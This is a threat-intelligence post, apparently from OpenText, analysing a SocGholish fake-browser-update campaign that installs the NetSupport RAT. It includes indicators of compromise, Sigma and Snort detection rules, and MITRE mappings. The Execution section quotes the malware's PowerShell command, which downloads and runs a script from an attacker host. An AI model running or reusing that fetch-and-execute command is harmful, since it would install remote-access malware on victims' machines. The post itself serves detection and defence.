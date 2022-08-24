The SocGholish campaign is suspected to be linked to the Russian threat actor known as “Evil Corp”. The threat actors are known to drop HTML code into outdated or vulnerable websites. When a user visits the compromised website, the code generates a pop-up within the browser attempting to trick the user into believing their browser is outdated. If a user is enticed to believe their browser is outdated, clicking the “Update” link causes the download of an archive file containing a malicious JavaScript. After the JavaScript is executed, additional malware is downloaded and installed on the user’s computer.

Infection chain

Compromised Site [Redacted] – Drive-by

casting.faeryfox[.]com – SocGholish Command and Control (C2)

aeoi[.]pl/21.ico – NetSupport RAT Download Site

94.158.247[.]32/fakeurl.htm – NetSupport RAT C2

Shown above: PCAP traffic observed during infection.

Initial access (drive-by)

Initial access was obtained when the user browsed to the compromised site hosting the injected HTML code.

Shown above: Obfuscated HTML code injected into compromised site which redirects visitors to Fake-Browser Update page

Shown above: Fake Browser Update page enticing user to download archive file containing malicious JavaScript

Execution

The execution stage was obtained when the user was tricked into downloading and executing the JavaScript within the downloaded archive file. The JavaScript was executed using the Windows Wscript process. The JavaScript contained obfuscated code which calls the Windows PowerShell process to connect with the download site and execute an additional PowerShell script.

Parent Process: C:\Windows\System32\wscript.exe

Child Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

CommandLine: “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -w h -c “iwr -usebasicparsing http://aeoi.pl/21.ico |iex”



PowerShell Module Logs: CommandInvocation(Invoke-WebRequest): “Invoke-WebRequest” ParameterBinding(Invoke-WebRequest): name=”UseBasicParsing”; value=”True” ParameterBinding(Invoke-WebRequest): name=”Uri”; value=”http://aeoi.pl/21.ico” CommandInvocation(Invoke-Expression): “Invoke-Expression”

Shown above: PowerShell user agent from infected host and PowerShell script hosted on download site

Shown above: Partial PowerShell script used to install and rename NetSupport RAT client

Shown above: File download and installed associated with the NetSupport RAT

Shown above: After installation NetSupport attempts to identify the user’s geo-location

Shown above: NetSupport client metadata showing original name after renaming

Persistence

Persistence was obtained by the PowerShell script hosted on the download site. The script created a registry key to run at startup.

Shown above: Registry Key created to start renamed NetSupport client whost.exe

Command and control

Shown above: C2 network communications from infected host to NetSupport RAT

OpenText custom content to identify NetSupport RAT behaviours

Sigma rules

Shown above: Sigma Rule used to detect process behavior associated with the NetSupport RAT

Shown above: Sigma Rule used to detect PowerShell Module Script behavior associated with the NetSupport RAT

Snort rules

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”OpenText – Windows Powershell User-Agent”; flow:established,to_server; content:”User-Agent|3a 20|Mozilla/”; content:”) WindowsPowerShell/”; http_header; classtype:not-suspicious; sid:20228161; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”OpenText – NetSupport GeoLocation Lookup”; flow:established,to_server; content:”Host|3a 20|geo.netsupportsoftware.com|0d 0a|”; http_header; content:”GET”; http_method; content:”/location/loca.asp”; http_uri; sid:20228162; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET 443 (msg:”OpenText – NetSupport RAT POST Request”; flow:established,to_server; content:”POST”; content:”User-Agent|3A 20|NetSupport Manager/”; nocase; sid:20228163; rev:1;)

Indicators of compromise

SHA-256 Hash: 520b8a64a11fdfb63d584e11ec1355cba6943cf102501fe4670c6429cdc13a61 – Сhrome.Updаte.zip

https://www.virustotal.com/gui/file/520b8a64a11fdfb63d584e11ec1355cba6943cf102501fe4670c6429cdc13a61/details

SHA-256 Hash: 1455c4250fea9a6a589ea23a60e130ab3f414a510d63cbf4eaf5693012d6272d – AutoUpdater.js https://www.virustotal.com/gui/file/1455c4250fea9a6a589ea23a60e130ab3f414a510d63cbf4eaf5693012d6272d/details

SHA-256 Hash: b6b51f4273420c24ea7dc13ef4cc7615262ccbdf6f5e5a49dae604ec153055ad – client32.exe

https://www.virustotal.com/gui/file/b6b51f4273420c24ea7dc13ef4cc7615262ccbdf6f5e5a49dae604ec153055ad/details

MITRE ATT&CK techniques observed

T1189 Drive-by Compromise

T1059.007 JavaScript

T1059.001 PowerShell

T1547.001 Registry Run Keys / Startup Folder

T1140 Deobfuscate/Decode Files or Information

T1219 Remote Access Software

Maintaining system protection

Author: Lenny Conway, Lead Consultant